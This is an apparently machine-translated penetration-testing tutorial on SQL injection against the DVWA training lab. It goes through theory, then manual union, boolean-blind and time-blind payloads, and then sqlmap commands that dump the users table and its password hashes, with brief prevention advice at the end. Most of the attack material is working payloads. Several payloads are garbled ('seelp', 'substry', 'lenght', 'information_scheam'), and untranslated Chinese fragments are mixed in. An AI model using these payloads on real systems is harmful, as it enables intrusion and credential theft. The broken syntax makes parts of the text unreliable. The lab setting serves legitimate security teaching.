SQL injection for penetration testing

sql injection one

theory:

1.sql language:

Structured query language
is a database query and programming language
used to access data and query, update, and manage relational database systems

Commonly used statements:
increase: insert into <table name><column name> values ​​(column value)
delete: delete from <table name> (where<delete condition>)
change: update <table name> set <column name=update value > (Where<update condition>)
check: select <column name>from<table name> (where<query condition expression>)

2.sql injection

By inserting the sql command into the web form or entering the query string of the domain name or page request, the
server is finally deceived to execute malicious SQL commands.

SQL injection uses the normal HTTP service port, which looks no different from normal web access on the surface, and is extremely concealed and difficult to be discovered.

3. The working principle of sql injection:

The attacker accesses the web server by constructing a special query statement. After the server receives the statement, it dynamically queries the data. The database returns the database information according to the corresponding requirements. After the server receives the information, it directly returns the obtained database information to the attacker.

4. Conditions for the formation of SQL injection vulnerabilities

The user can control the input of data. The
original SQL code to be executed is spliced ​​with user input.

5. The realization of sql injection:

a. SQL query statement
select * from news where id=1
Normally, it means: query the record with id 1 in the news table.
b. SQL injection
Add malicious code and reconstruct the statement
select * from news where id=1 or 1=1.
If all data records in the table are returned, there is an injection point.

c. Query the database;
splicing query statements through union and other methods to finally obtain database-related information.
For example, administrator account and password information.

d. There is no legal check on the id value

6. The harm of sql injection;

Database information leakage
Web page tampering
Website hanging horse
Malicious operation of database
Remote control of server
Destruction of hard disk data

7.sql injection classification:

Injection point type: digital injection, character injection
digital type: its injection point type is a number (no quotes to close the sentence)
common URL types such as: http://xxxx.com/sqli.php?id=1
internal sql Statement: select * from table name where id = ($id)

Character injection: The injection point type is a character type, which needs to be closed with single quotation marks.
Common URL types such as: http://xxxx.com/sqli.php?name=fcfc
Internal SQL statement: select * from table name where name ='($name)'

Injection point location:
get injection, the injection point location is in the get parameter section
Post injection, the injection field is in the post data (usually in form submission, product query)
cookie injection, the injection field is
searched in the cookie data, and the injection point is search Location (also belongs to post injection)
HTTP header injection, the injection point is in a certain field of the http header

Pseudo-static injection
base64 injection
Second-order injection
xml entity injection
phpcmsv9 authkey injection

Page return result:
with echo:
error injection: use count(*), rand(), group by to construct error function
uunion injection: use union query to get all the data you want

No echo
Boolean blind note: get the information we need by constructing logical judgment
Time blind note: use sleep() function to observe the difference in web application response time

sql manual injection (primary)

Experimental environment
dvwa

Actual combat:

1. Configure dvwa:
enter dvwa, select dvwa security, and set the security level to low.

2. Test the SQL injection point

1. Click sql injection to enter the test page

2. Try to enter single quotes, if an error is reported, there may be injection points on the page

3. Enter 1'or '1'='1 to return all data information, indicating that the user input information is not controlled.

4. Guess the number of fields in the sql statement:
'or 1=1 order by 1#
' or 1=1 order by 2#
'or 1=1 order by 3#
If an error is reported at 3, the number of fields For 2

5. Determine the order of the displayed fields:
1'union select 1,2#

6. Get the current database name:
1'union select 1,database()#

7. Get the table name in the database:
1'union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#

8. Get the field names in the users table:
'union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

9. Get the data in the table:
'union select group_concat (user_id,user),group_concat (password) from users#

10. Decrypt the MD5 value of the user password through tools or the network

sql manual injection (intermediate)

Experimental environment:
DVWA: security level is set to medium
burp suite: proxy settings, select the options under proxy to add the proxy interface that needs to be listened to.
Setting the browser is a proxy option: (configure according to different browsers)

Actual combat:
1. Set the intercept request in burp, and then submit any parameters on the test page. At this time, the intercepted data packet appears in burp. Change
the id= parameter to 1 or 1=1, and click the proxy-intercept-forward button, Return to the test page. If the data is returned and the data query is successful, then there is a digital vulnerability.
If the id parameter is set to 'or '1'='1 if the query is successful, there is a character vulnerability.

2. Use burpsuite software to guess the number of fields in the sql query statement.
After capturing the id value of the data packet, use the following commands in turn to guess the solution one by one until the number of fields is guessed.
order by 1 #
order by 2 #
order by 3#

3. Use burpsuite to determine the order of the displayed fields.
After capturing the id value of the data packet, add the statement:
union select 1,2 #

4. Use burpsuite to get the current database name
   . Add the statement after the id value of the data package:
   union select 1,database() #

5. Use burpsuite to get the table name
   in the current database. Add the statement after the id value of the data package:
   union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#

6. Use burpsuite to get the field names
   in the users table: select the decoder option in burp suite, enter users, and select the html option under encode as to get the hexadecimal value in the users table.
   Then add the statement after capturing the id value of the data packet:
   union select 1, group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #

7. Use burpsuite to get the data
   in the table: add the statement after the id value of the data package:
   union select group_concat(user_id, user),group_concat(password) from users #

sql manual injection (advanced)

Experimental environment:
DVWA

Actual combat:
1. Enter dvwa and set the security level to high

2. Enter 1'or 1=1# on the front page, and the data query is successful, indicating that there is a character injection vulnerability

3. Guess the number of fields in the query statement:
1'or 1=1 order by 1 #
1'or 1=1 order by 2 #
1'or 1=1 order by 3 #

4. Determine the order of the displayed fields:
1'union select 1,2 #

5. Get the database name
1'union select 1, database() #

6.获取表名：
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

7. Get the field names in the users table;
1'union select 1, group_concat(column_name) from information_schema.columns where table_name=0x7573657273 #
(The hexadecimal representation of'users' is 0x7573657273)

8. Get the data in the table:
1'or 1=1 union select group_concat(user_id,user),group_concat(password) from users #

9. Decrypt the obtained password with a tool:

sql blind injection

Blind injection, that is, in the SQL injection process, after the SQL statement is selected, the selected data cannot be echoed to the front end. We need to use some special methods to judge or try. This process is called blind injection.

Boolean blinds

Use the and method in the sql statement to return correct or wrong to construct

The experimental environment
DVWA
set the security level to low

Actual combat;
1. Enter sql injection (blind), enter the test page

2. Use 1'and 1=1 #Submit, the display page exists, use 1'and 1=2 #Submit, the display page does not exist.
In this way, it can be basically judged that there is injection

3. Guess the length of the database name:
1'and length(database())=1 # //Display does not exist
1'and length(database())=2 # //Display does not exist
1'and length(database( ))=3 # //Display does not exist
1'and length(database())=4 # //Display does not exist

4. Guess the name of the database by dichotomy:
1'and ascii(substry(database(),1,1))<100 # //Display does not exist
1'and ascii(substry(database(),1,1))> 100 # //Display does not exist
Modify the second parameter of the substr function in this command, such as (substr(database(), 2, 1)) to test to get the second letter of the database.

5. Guess the number of database tables:
   1'and (select count(table_name) from information_schema.tables where table_schema=database())=1 # //Display does not exist

1'and (select count(table_name) from information_schema.tables where table_schema=database())=2 # //Show existence, indicating that there are two tables

6. Guess the length of the database table name:
1'and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=1 # //Display does not exist

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1))=9 # //显示存在

1’ and length(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1))=5 # //显示存在

7. Guess the name of the database table
1'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103 # //Display does not exist

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103 # //显示不存在

1’ and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103 # //显示存在

Repeat the steps to guess all table names

8. Guess the field length in the database table:
1'and (select count(column_name) from information_schema.columns where table_name ='users')=1#

1’ and (select count(column_name) from information_schema.columns where table_name =’users’)=8#

9. Guess the field name in the database table
1'and ascii(substr((select column_name from information_schema.column where table_name='users' limit 0,1),1,1))<117 # //Display does not exist

1’ and ascii (substr((select column_name from information_schema.column where table_name=‘users’ limit 0,1),1,1))>117 #显示不存在

10. Guess the data in the table:
1'and (select count(first_name) from users)=5# //Show existence, indicating that the number of fields in the users table is 5
Guess the length of each record, indicating the first name of first_name The length of the value is 5 characters
1'and (select count(first_name) from users)=5# //Show existence

11. Guess the data in the table by dichotomy:

1’ and ascii(substr((select first_name from users limit 0,1),1,1))<97 #
1’ and ascii(substr((select first_name from users limit 0,1),1,1))>97 #
1’ and ascii(substr((select first_name from users limit 0,1),1,1))=97 #

Time blinds:

Time-based delay

The experimental environment
DVWA
set the security level to low

Actual combat;
1. Enter sql injection (blind), enter the test page

2. Use 1 and sleep(5) # to submit and find that the page is not delayed.
   Use 1'and sleep(5) # to submit and find that the page is significantly delayed
   . It is a character-based time blind note.

3. Guess the length of the database name
1'and if(length(database())=1,sleep(5),1)# //Found no delay

1'and if(length(database())=4,sleep(5),1)# /It is found that there is a delay, indicating that the length of the library name is 4

4. Dichotomy guessing the database name
1'and if(ascii(substr(database(),1,1))>97,seelp(5),1)# //Significant delay 1'and
if(ascii(substr( database(),1,1))>100,seelp(5),1)# //No delay 1'and
if(ascii(substr(database(),1,1))<100,seelp(5), 1)# //No delay

In this command, modify the second parameter of the substr function, such as (substr(database(), 2, 1)) to test to get the second letter of the database.

5. Guess the number of database tables
1'and if((select count(table_name) from information_schema.tables where table_schema=database())=1,seelp(5),1)# No delay

1'and if((select count(table_name) from information_schema.tables where table_schema=database())=2,seelp(5),1)# //There is a delay, indicating that there are two tables

6.Guess the length of the table 1'and if (lenght(substr((select table_name from information_scheam.tables where table_schema=database() limit0,1),1))=1,seelp(5),1)# // No delay

1’ and if (lenght(substr((select table_name from information_scheam.tables where table_schema=database() limit0,1),1))=9,seelp(5),1)# //有延迟

7. Guess the database name:

1’ and if (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>103,seelp(5),1)# //无延迟

1’ and if (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<103,seelp(5),1)# //有延迟

8. Guess the field length in the database table
1'and if((select count(column_name) from information_schema.columns where table_name ='users')=1, sleep(5),1# //No delay

1’ and if((select count(column_name) from information_schema.columns where table_name =‘users’)=8, sleep(5),1# //有延迟

9. Guess the name of the field in the database table

1’ and if(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1,1))<117,sleep(5),1 # //无延迟

1’ and if(ascii(substr((select column_name from information_schema.columns where table_name=‘users’ limit 0,1),1,1))>117,sleep(5),1 # //无延迟

10. Guess the data in the table:
1'and if((select count(first_name) from users)=5,sleep(5),1)# //
The number of fields in the users table is obviously delayed to 5
Guess each record The length of the first_name indicates that the length of the first value is 5 characters
1'and if(length(substr((select first_name from users limit0,1),1))=5,sleep(5),1)#/ /With delay

11.Dichotomy guess the data in the table
1'and if(ascii(substr((select first_name from users limit 0,1),1,1))>97,sleep(5),1)# //no delay
1 'and if(ascii(substr((select first_name from users limit 0,1),1,1))<,sleep(5),1)# //No delay

sqlmap tool injection:

Test environment:
dvwa
kali
actual combat:
1. Call the sqlmap tool in kali, use the command sqlmap -u target address to test, and the
system jumps directly to the login page.

2. By checking the browser element, in the request header, you can find the cookie value of the current browser

3. Add the -cookie parameter and construct the following command
sqlmap -u "http://192.168.1.10:81/DVWA/vulnerabilities/sqli/?id=1&Submit#" --cookie="security=low;PHPSESSID=hlt719753di5a70lfvcuo1nda5"

Need to manually input the relevant Y/N parameters continuously

4. After adding the --batch parameter, sqlmap will automatically fill in the parameters and execute.
Found a union query type injection point
sqlmap -u "http://192.168.1.10:81/DVWA/vulnerabilities/sqli/?id=1&Submit#" --cookie="security=low;PHPSESSID=hlt719753di5a70lfvcuo1nda5" --batch

5. Get database related information
   Add parameter --dbs
   sqlmap -u "http://192.168.1.10:81/DVWA/vulnerabilities/sqli/?id=1&Submit#" --cookie="security=low;PHPSESSID=hlt719753di5a70lfvcuo1nda5" - batch --dbs

6. Get the table name in the database
   Use -D xxx to specify the database to be viewed, and use –tables to view all the tables in the database
   sqlmap -u "http://192.168.1.10:81/DVWA/vulnerabilities/sqli/?id=1&Submit#" --cookie="security=low;PHPSESSID=hlt719753di5a70lfvcuo1nda5" --batch --dbs -D dvwa

7. Get the field names in the users table
   Use -D xxx (library name) -T xxx (table name) --columns to enumerate all field information in the table
   sqlmap -u "http://192.168.1.10:81/DVWA/vulnerabilities /sqli/?id=1&Submit#" --cookie="security=low;PHPSESSID=hlt719753di5a70lfvcuo1nda5" --batch --dbs -D dvwa -T users --columns

8. Get the data in the table.
   Obtain user and password parameters, the specific commands are as follows
   -D (xxx database name) -T (xxx table name) -C (field name) -dump to dump DBMS data table items

sqlmap -u “http://192.168.1.10:81/DVWA/vulnerabilities/sqli/?id=1&Submit#” --cookie=“security=low;PHPSESSID=hlt719753di5a70lfvcuo1nda5” --batch --dbs -D dvwa -T users -C user_id,user,password --dump

SQL injection prevention:

1. Database security hardening, WAF, IDS\IPS
2. Strictly escape and filter the input
3. Use parameterized (Parameterized)
4.
PDO pre-processing-PDO pre- processing can prevent SQL injection reasons without PDO pre- processing For the processed SQL, when the SQL statement is entered for execution, the web server may piece together dangerous SQL statements when it is pieced together by itself. However, if the SQL preprocessed by PDO is performed, MYSQL will be put together by itself. Even if the dangerous SQL statement is entrained, it will not be processed and will only be passed in as a parameter instead of spliced ​​into the SQL statement to prevent it. SQL injection.